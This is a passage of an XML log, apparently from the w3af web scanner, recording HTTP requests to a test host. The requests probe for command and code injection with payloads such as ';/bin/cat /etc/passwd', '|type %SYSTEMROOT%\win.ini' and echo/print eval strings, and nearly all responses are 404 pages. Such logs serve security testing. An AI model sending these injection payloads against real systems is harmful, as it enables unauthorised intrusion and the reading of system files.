                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="258">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="260">
                <http-request>
                    <status>GET http://10.12.68.43:31337/print+%27lpjqi%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="261">
                <http-request>
                    <status>GET http://10.12.68.43:31337/print+%27lpjqi%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="262">
                <http-request>
                    <status>GET http://10.12.68.43:31337/echo+str_repeat%28%27lpjqi%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="264">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Response.Write%28new+String%28%22lpjqi%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22lpjqi%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="265">
                <http-request>
                    <status>GET http://10.12.68.43:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="266">
                <http-request>
                    <status>GET http://10.12.68.43:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="267">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="269">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="270">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="271">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="272">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="273">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="274">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="275">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="276">
                <http-request>
                    <status>GET http://10.12.68.43:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="277">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="278">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="279">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="282">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
